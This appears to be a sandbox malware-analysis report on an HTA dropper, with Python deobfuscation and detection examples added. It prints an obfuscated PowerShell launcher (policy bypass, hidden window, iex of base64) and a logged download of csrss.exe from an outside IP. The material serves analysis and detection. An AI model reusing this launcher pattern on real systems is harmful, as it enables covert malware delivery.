                                              SHA1:38B3839491653E03B15DFBC8DEFCCE64628022D5
                                              SHA-256:FC7E9BC8B084F32D32CD281405CF0FF90D2179A45D182288E98E8B948B1C415C
                                              SHA-512:0DD49AF034EC23F5F78796A36B4F16053306FA260F5B35D4A7EA32B3166A53DA004184A0EC7E33F4A5DBFCE1F8CAD8CCF742F3B616939B7D5944A769CE2184B0
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.306461250274409
                                              Encrypted:false
                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                              Malicious:false
                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                              File type:HTML document, ASCII text, with very long lines (14911), with CRLF line terminators
                                              Entropy (8bit):1.8320562508506997
                                              TrID:
                                              • HyperText Markup Language (15015/1) 100.00%
                                              File name:sdf.hta
                                              File size:15'079 bytes
                                              MD5:73f9f8f8c9738f49854820688beae627
                                              SHA1:467d5d213bd6f827aab35d5404eb01792bf19213
                                              SHA256:8335aea59fc0f9ed4542db9221ee7e2c5ea6d7df36fe31ba7fe04bff878717a0
                                              SHA512:1d47dc51214389c7791f5651f27aad1639a3df64a381ec92447599f788eb752ea9a690012a6b01be140dc3dc4b89f8398bdfbbcf983128edacfd0b6f5c853805
                                              SSDEEP:48:3PCAOdNN/HwrdNNgJHwB47wPnjRftdEpy7zUA+UZJbksLDMdNNhTdNNpHw4dNNd+:/CxdYrdjWMPjR0KQNUjbjMdRTdW4dN+
                                              TLSH:1F620D609C34EEA093E387525DCDE8F8D54D5F1B800149E7709C58A7D3A2A2894E57B3
                                              File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRiPT LaNgUaGe="VBScRipt">..DIM
                                               Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                               Apr 15, 2025 09:44:13.549175978 CEST  49714        80         192.168.2.4     172.245.191.88
                                               Apr 15, 2025 09:44:13.687292099 CEST  80           49714      172.245.191.88  192.168.2.4
                                               Apr 15, 2025 09:44:13.687536001 CEST  49714        80         192.168.2.4     172.245.191.88
                                               Apr 15, 2025 09:44:13.687726974 CEST  49714        80         192.168.2.4     172.245.191.88
                                               Apr 15, 2025 09:44:13.828901052 CEST  80           49714      172.245.191.88  192.168.2.4
                                               Apr 15, 2025 09:44:13.829050064 CEST  49714        80         192.168.2.4     172.245.191.88
                                               Apr 15, 2025 09:44:18.825237989 CEST  80           49714      172.245.191.88  192.168.2.4
                                               Apr 15, 2025 09:44:18.825294018 CEST  49714        80         192.168.2.4     172.245.191.88
                                               Apr 15, 2025 09:44:20.666430950 CEST  49714        80         192.168.2.4     172.245.191.88
                                              • 172.245.191.88
                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                               0           192.168.2.4  49714        172.245.191.88  80                7552  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                               Timestamp                             Bytes transferred  Direction  Data
                                               Apr 15, 2025 09:44:13.687726974 CEST  287                OUT        GET /620/csrss.exe HTTP/1.1
                                               Accept: */*
                                               Accept-Encoding: gzip, deflate
                                               User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                               Host: 172.245.191.88
                                               Connection: Keep-Alive
                                               Apr 15, 2025 09:44:13.828901052 CEST  543                IN         HTTP/1.1 404 Not Found
                                              Date: Tue, 15 Apr 2025 14:44:12 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                              Content-Length: 301
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 172.245.191.88 Port 80</address></body></html>


                                              Target ID:0
                                              Start time:03:44:06
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\mshta.exe
                                              Wow64 process (32bit):true
                                              Commandline:mshta.exe "C:\Users\user\Desktop\sdf.hta"
                                              Imagebase:0xc70000
                                              File size:13'312 bytes
                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:1
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
                                              Imagebase:0xc70000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff62fc20000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
                                              Imagebase:0x1e0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
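The obfuscation in the Target ID 3 command line is mechanical: the inner iex builds the expression [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) out of single-quoted fragments and [char] casts (0x3a and 58 are both ':', 0x22 is '"'), the outer iex then runs whatever that expression decodes, and the abbreviated switches -Ex byPaSS, -Nop and -w 1 set ExecutionPolicy Bypass, NoProfile and WindowStyle Hidden. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds that expression statically (no PowerShell is evaluated) and pulls out the host-independent indicators a detection engineer would key on. Because the report redacts the base64 blob, SAMPLE_PAYLOAD is a constructed stand-in; the rest of SAMPLE_CMDLINE is the command line as the process list records it, with the DeViCecredENTialDEployMEnT.exe token left exactly as recorded. The case-transition cut-off of 4 is an assumed heuristic, not a value from the report.

```python
"""Static deobfuscation of the PowerShell one-liner recorded for Target ID 3.

Added example, not part of the Joe Sandbox report. The report redacts the
base64 blob, so SAMPLE_PAYLOAD is a CONSTRUCTED stand-in; the rest of
SAMPLE_CMDLINE is the command line as the process list records it.
"""
import base64
import re

SAMPLE_PAYLOAD = base64.b64encode(b"Write-Host 'constructed stand-in payload'").decode("ascii")

SAMPLE_CMDLINE = (
    "PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; "
    "iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58"
    "+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a"
    "+'FRoMbaSE64StRiNg('+[chAr]0x22+'" + SAMPLE_PAYLOAD + "'+[chaR]0x22+'))')))"
)

# One token of a PowerShell concatenation chain: a single-quoted literal
# ('' is the escaped quote inside it) or a [char]N cast, N decimal or 0x-hex.
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\](0x[0-9a-f]+|[0-9]+)", re.IGNORECASE)
_B64_ARG = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)


def assemble_concat(expr: str) -> str:
    """Rebuild the string a 'literal'+[char]N+'literal' chain evaluates to.

    Only literals and [char] casts are honoured, so nothing is executed;
    variables or method calls in the chain would simply be skipped.
    """
    out = []
    for literal, code in _TOKEN.findall(expr):
        if code:
            out.append(chr(int(code, 16) if code[:2].lower() == "0x" else int(code)))
        else:
            out.append(literal.replace("''", "'"))
    return "".join(out)


def deobfuscate(cmdline: str) -> dict:
    """Peel both layers: the [char]-spliced expression the inner iex builds,
    then the base64 text the outer iex executes (GetString uses UTF-8)."""
    stage1 = assemble_concat(cmdline)
    m = _B64_ARG.search(stage1)
    if m is None:
        raise ValueError("no FromBase64String(...) call found after assembly")
    payload = base64.b64decode(m.group(1)).decode("utf-8")
    return {"stage1": stage1, "base64": m.group(1), "payload": payload}


def case_transitions(token: str) -> int:
    """Upper/lower switches between adjacent letters: 'PowErshELL' scores 4,
    'PowerShell' 3, 'powershell' 0. The >= 4 cut-off used in indicators()
    is an assumed heuristic, not a value taken from the report."""
    letters = [c for c in token if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def indicators(cmdline: str) -> list:
    """Host-independent indicators to key detections on for this launch shape."""
    low = cmdline.lower()
    found = []
    if re.search(r"-ex\w*\s+bypass", low):
        found.append("execution policy bypass")          # -Ex byPaSS
    if re.search(r"-nop\b", low):
        found.append("no profile")                       # -Nop
    if re.search(r"-w(indowstyle)?\s+(1|hidden)\b", low):
        found.append("hidden window")                    # -w 1
    if re.search(r"\biex\b|invoke-expression", low):
        found.append("invoke-expression")
    if "frombase64string" in low:
        found.append("base64 payload")
    if len(re.findall(r"\[char\]", low)) >= 3:
        found.append("[char] splicing")
    if any(case_transitions(t) >= 4 for t in re.findall(r"[A-Za-z]+", cmdline)):
        found.append("case anomaly")
    return found


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print("stage 1 :", result["stage1"])
    print("payload :", result["payload"])
    print("flags   :", ", ".join(indicators(SAMPLE_CMDLINE)))
```

On the real sample the decoded payload is the script that goes on to compile C# and call URLDownloadToFileW; it should be handled as a second stage in its own right, not executed, and the same assemble_concat pass is worth re-running on it since the [char] splicing trick is usually reused inside.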

                                              Target ID:4
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
                                              Imagebase:0xa0000
                                              File size:2'141'552 bytes
                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6ca680000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:6
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"
                                              Imagebase:0xc50000
                                              File size:46'832 bytes
                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
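Target IDs 4 and 6 are the footprint PowerShell leaves when it compiles C# at run time (Add-Type and similar): powershell.exe starts csc.exe with a response file under the user's AppData\Local\Temp, csc.exe starts cvtres.exe, and the execution graph further down reaches URLDownloadToFileW from a region of the powershell.exe address space rather than from a module on disk. The Python below is an added example, not part of the Joe Sandbox report: it encodes that ancestry as three rules over process-creation events. Image paths and command lines follow the process list; PIDs, parent PIDs and the event layout are constructed so the script runs offline, and the long one-liners are truncated because the rules do not depend on them.

```python
"""Process-ancestry detection for the csc.exe/cvtres.exe compile chain in the
process list above.

Added example, not part of the Joe Sandbox report. Image paths and command
lines follow the report; PIDs, parent PIDs and the event layout are
CONSTRUCTED so the example runs offline (the cmd.exe and PowerShell
one-liners are truncated here, the rules below do not need them).
"""
import ntpath
import re

EVENTS = [
    {"pid": 1001, "ppid": 1000, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c ..."'},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 1003, "ppid": 1001,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"PowErshELL -Ex byPaSS -Nop -w 1 -c ..."},
    {"pid": 1004, "ppid": 1003,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
                r'@"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"'},
    {"pid": 1005, "ppid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
    {"pid": 1006, "ppid": 1004,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY '
                r'/MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" '
                r'"c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"'},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
RESPONSE_FILE = re.compile(r'@"([^"]+)"')            # csc.exe @"...cmdline" argument
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)


def image_name(event: dict) -> str:
    return ntpath.basename(event["image"]).lower()


def ancestry(pid: int, procs: dict, max_depth: int = 8) -> list:
    """Image names from pid upwards, stopping at an unknown parent, a cycle
    (PID reuse) or max_depth."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(image_name(procs[pid]))
        pid = procs[pid]["ppid"]
    return chain


def detect(events: list) -> list:
    """Three rules keyed on the report's compile chain. Each hit carries the
    ancestry so an analyst sees which script host drove the compile."""
    procs = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e["pid"], procs)
        name = chain[0]
        if name == "csc.exe":
            m = RESPONSE_FILE.search(e["cmdline"])
            if m and USER_WRITABLE.search(m.group(1)):
                hits.append({"rule": "dotnet_compile_from_temp", "pid": e["pid"],
                             "chain": chain, "response_file": m.group(1)})
            if SCRIPT_HOSTS & set(chain[1:]):
                hits.append({"rule": "csc_spawned_by_script_host", "pid": e["pid"],
                             "chain": chain})
        elif (name == "cvtres.exe" and len(chain) > 2 and chain[1] == "csc.exe"
              and SCRIPT_HOSTS & set(chain[2:])):
            hits.append({"rule": "cvtres_under_script_host_compile", "pid": e["pid"],
                         "chain": chain})
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit["rule"], hit["pid"], " <- ".join(hit["chain"]), hit.get("response_file", ""))
```

The response_file path in the first hit is the collection lead: the .cmdline file, the .cs source next to it and the compiled output in that Temp directory are what the report's "Drops PE files" and "Found dropped PE file which has not been started or loaded" signatures refer to, and they are usually still on disk when the host is triaged.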


                                                Execution Graph

                                                Execution Coverage:3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:17%
                                                Total number of Nodes:47
                                                Total number of Limit Nodes:6
                                                execution_graph 10736 4be763f 10737 4be75da 10736->10737 10738 4be764b 10736->10738 10744 4be7da8 10737->10744 10748 4be7c45 10737->10748 10756 4be7a08 10737->10756 10765 4be7a18 10737->10765 10739 4be75df 10745 4be7cf9 10744->10745 10745->10744 10774 78545f4 10745->10774 10782 7854610 10745->10782 10750 4be7b9a 10748->10750 10753 4be7c5e 10748->10753 10749 4be7de8 URLDownloadToFileW 10752 4be7ea8 10749->10752 10750->10748 10750->10749 10752->10739 10754 78545f4 3 API calls 10753->10754 10755 7854610 3 API calls 10753->10755 10754->10753 10755->10753 10761 4be7a14 10756->10761 10758 4be7ea8 10758->10739 10759 4be7b30 10759->10739 10760 4be7de8 URLDownloadToFileW 10760->10758 10761->10759 10761->10760 10762 4be7c5e 10761->10762 10763 78545f4 3 API calls 10762->10763 10764 7854610 3 API calls 10762->10764 10763->10762 10764->10762 10770 4be7a1c 10765->10770 10767 4be7ea8 10767->10739 10768 4be7b30 10768->10739 10769 4be7de8 URLDownloadToFileW 10769->10767 10770->10768 10770->10769 10771 4be7c5e 10770->10771 10772 78545f4 3 API calls 10771->10772 10773 7854610 3 API calls 10771->10773 10772->10771 10773->10771 10776 7854610 10774->10776 10775 7854a93 10775->10745 10776->10775 10778 4be7a18 4 API calls 10776->10778 10779 4be7a08 4 API calls 10776->10779 10780 4be7c45 4 API calls 10776->10780 10790 4be1c00 10776->10790 10777 7854a34 10777->10745 10778->10777 10779->10777 10780->10777 10783 7854a93 10782->10783 10784 7854641 10782->10784 10783->10745 10784->10783 10786 4be7a18 4 API calls 10784->10786 10787 4be7a08 4 API calls 10784->10787 10788 4be7c45 4 API calls 10784->10788 10789 4be1c00 URLDownloadToFileW 10784->10789 10785 7854a34 10785->10745 10786->10785 10787->10785 10788->10785 10789->10785 10791 4be7e00 URLDownloadToFileW 10790->10791 10793 4be7ea8 10791->10793 10793->10777

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 174 4be7a18-4be7a4a 176 4be7a4c-4be7a53 174->176 177 4be7a90 174->177 179 4be7a64 176->179 180 4be7a55-4be7a62 176->180 178 4be7a93-4be7acf 177->178 189 4be7b58-4be7b63 178->189 190 4be7ad5-4be7ade 178->190 181 4be7a66-4be7a68 179->181 180->181 182 4be7a6f-4be7a71 181->182 183 4be7a6a-4be7a6d 181->183 187 4be7a82 182->187 188 4be7a73-4be7a80 182->188 186 4be7a8e 183->186 186->178 192 4be7a84-4be7a86 187->192 188->192 193 4be7b65-4be7b68 189->193 194 4be7b72-4be7b94 189->194 190->189 191 4be7ae0-4be7ae6 190->191 195 4be7aec-4be7af9 191->195 196 4be7de8-4be7dfd 191->196 192->186 193->194 201 4be7c5e-4be7cf6 194->201 202 4be7b9a-4be7ba3 194->202 198 4be7b4f-4be7b56 195->198 199 4be7afb-4be7b2e 195->199 206 4be7e6f-4be7e70 196->206 207 4be7dff-4be7e52 196->207 198->189 198->191 216 4be7b4b 199->216 217 4be7b30-4be7b33 199->217 243 4be7cf9-4be7d52 201->243 202->196 205 4be7ba9-4be7be7 202->205 228 4be7be9-4be7bff 205->228 229 4be7c01-4be7c14 205->229 210 4be7e71-4be7ea6 URLDownloadToFileW 206->210 223 4be7e5d-4be7e63 207->223 224 4be7e54-4be7e5a 207->224 214 4be7eaf-4be7ec3 210->214 215 4be7ea8-4be7eae 210->215 215->214 216->198 220 4be7b3f-4be7b48 217->220 221 4be7b35-4be7b38 217->221 221->220 223->210 225 4be7e65-4be7e6e 223->225 224->223 225->210 230 4be7c16-4be7c1d 228->230 229->230 231 4be7c1f-4be7c30 230->231 232 4be7c42-4be7c58 230->232 231->232 237 4be7c32-4be7c3b 231->237 232->201 232->202 237->232 256 4be7d55 call 78545f4 243->256 257 4be7d55 call 7854610 243->257 248 4be7d57-4be7d60 249 4be7d7a-4be7d8d 248->249 250 4be7d62-4be7d78 248->250 251 4be7d8f-4be7d96 249->251 250->251 252 4be7d98-4be7d9e 251->252 253 4be7da5-4be7daf 251->253 252->253 253->243 256->248 257->248
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1268274167.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_4be0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06fefe11eb8d77dbdb59e91d67e60d75c8e67e113c3f473eae6cacce92169306
                                                • Instruction ID: 0cb83b3e77219c803737b43717c5d6c5d464394da257a4b2cb58be9dbcb922d7
                                                • Opcode Fuzzy Hash: 06fefe11eb8d77dbdb59e91d67e60d75c8e67e113c3f473eae6cacce92169306
                                                • Instruction Fuzzy Hash: 33E12C75A00219EFDB15CF99D484AADFBB2FF88310F248159E804AB355DB35ED52CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7854610-785463b 1 7854641-7854646 0->1 2 7854af2-7854b12 0->2 3 785465e-7854663 1->3 4 7854648-785464e 1->4 10 7854b14-7854b16 2->10 11 7854b1c-7854b1e 2->11 8 7854665-7854671 3->8 9 7854673 3->9 5 7854650 4->5 6 7854652-785465c 4->6 5->3 6->3 12 7854675-7854677 8->12 9->12 14 7854b1f-7854b25 10->14 15 7854b18-7854b1b 10->15 11->14 16 7854a93-7854a9d 12->16 17 785467d-7854687 12->17 20 7854b35 14->20 21 7854b27-7854b33 14->21 15->11 18 7854a9f-7854aa8 16->18 19 7854aab-7854ab1 16->19 17->2 22 785468d-7854692 17->22 26 7854ab7-7854ac3 19->26 27 7854ab3-7854ab5 19->27 23 7854b37-7854b39 20->23 21->23 24 7854694-785469a 22->24 25 78546aa-78546b8 22->25 31 7854b7b-7854b85 23->31 32 7854b3b-7854b42 23->32 29 785469c 24->29 30 785469e-78546a8 24->30 25->16 40 78546be-78546dd 25->40 28 7854ac5-7854aef 26->28 27->28 29->25 30->25 36 7854b87-7854b8b 31->36 37 7854b8e-7854b94 31->37 32->31 34 7854b44-7854b61 32->34 45 7854b63-7854b75 34->45 46 7854bc9-7854bce 34->46 41 7854b96-7854b98 37->41 42 7854b9a-7854ba6 37->42 40->16 54 78546e3-78546ed 40->54 44 7854ba8-7854bc6 41->44 42->44 45->31 46->45 54->2 55 78546f3-78546f8 54->55 56 7854710-7854714 55->56 57 78546fa-7854700 55->57 56->16 60 785471a-785471e 56->60 58 7854704-785470e 57->58 59 7854702 57->59 58->56 59->56 60->16 61 7854724-7854728 60->61 61->16 63 785472e-785473e 61->63 64 7854744-785476b 63->64 65 78547c6-7854815 63->65 70 7854785-78547b3 64->70 71 785476d-7854773 64->71 82 785481c-785482f 65->82 80 78547b5-78547b7 70->80 81 78547c1-78547c4 70->81 73 7854775 71->73 74 7854777-7854783 71->74 73->70 74->70 80->81 81->82 83 7854835-785485c 82->83 84 78548b7-7854906 82->84 89 7854876-78548a4 83->89 90 785485e-7854864 83->90 101 785490d-7854920 84->101 99 78548a6-78548a8 89->99 100 78548b2-78548b5 89->100 91 7854866 90->91 92 7854868-7854874 90->92 91->89 92->89 99->100 100->101 102 7854926-785494d 101->102 103 78549a8-78549f7 101->103 108 7854967-7854995 102->108 109 785494f-7854955 102->109 120 78549fe-7854a2c 103->120 118 7854997-7854999 108->118 119 78549a3-78549a6 108->119 110 7854957 109->110 111 7854959-7854965 109->111 110->108 111->108 118->119 119->120 125 7854a2f call 4be7a18 120->125 126 7854a2f call 4be7a08 120->126 127 7854a2f call 4be7c45 120->127 128 7854a2f call 4be1c00 120->128 123 7854a34-7854a90 125->123 126->123 127->123 128->123
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq$tPq
                                                • API String ID: 0-4270251778
                                                • Opcode ID: 2b26f081387c5cebfc4a7b57ea9c0ddf8a72b07c459df78933611d23c6f07198
                                                • Instruction ID: 1b1cffb4e596ee17d7f70a3ae786f8b47c476371467bdce24222342e56472e38
                                                • Opcode Fuzzy Hash: 2b26f081387c5cebfc4a7b57ea9c0ddf8a72b07c459df78933611d23c6f07198
                                                • Instruction Fuzzy Hash: 8DF1C5B4B00345AFDB148F69C410B6ABBE2EBD9610F288569ED09DB350DF72DC81CB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 78504f8-785050a 132 7850510-7850521 129->132 133 78505ca-78505ea 129->133 136 7850523-7850529 132->136 137 785053b-7850558 132->137 138 78505f3-78505f6 133->138 139 78505ec-78505ee 133->139 140 785052d-7850539 136->140 141 785052b 136->141 137->133 149 785055a-785057c 137->149 142 78505f7-78505fd 138->142 139->142 143 78505f0-78505f1 139->143 140->137 141->137 145 78505ff-785063e 142->145 146 785066b-7850675 142->146 143->138 166 7850640-785064e 145->166 167 78506bb-78506c0 145->167 147 7850677-785067d 146->147 148 7850680-7850686 146->148 151 785068c-7850698 148->151 152 7850688-785068a 148->152 157 7850596-78505ae 149->157 158 785057e-7850584 149->158 154 785069a-78506b8 151->154 152->154 168 78505b0-78505b2 157->168 169 78505bc-78505c7 157->169 160 7850586 158->160 161 7850588-7850594 158->161 160->157 161->157 173 7850656-7850665 166->173 167->166 168->169 173->146
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq$tPq
                                                • API String ID: 0-4270251778
                                                • Opcode ID: 8b0db65041a8dd6314333298698e6c1efa5ff836bbe081547f832d20a6d780b5
                                                • Instruction ID: 51844442fc677846ca6b7de16ff4c38a01f5d9b37a79fe6879e84a35232b3cb9
                                                • Opcode Fuzzy Hash: 8b0db65041a8dd6314333298698e6c1efa5ff836bbe081547f832d20a6d780b5
                                                • Instruction Fuzzy Hash: 915177B5B00315AFD7248B798814B6ABBE2EFD5710F18842AED49EF381DA71DC01C3A1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 258 4be1c00-4be7e52 261 4be7e5d-4be7e63 258->261 262 4be7e54-4be7e5a 258->262 263 4be7e65-4be7e6e 261->263 264 4be7e71-4be7ea6 URLDownloadToFileW 261->264 262->261 263->264 266 4be7eaf-4be7ec3 264->266 267 4be7ea8-4be7eae 264->267 267->266
                                                APIs
                                                • URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 04BE7E99
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1268274167.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_4be0000_powershell.jbxd
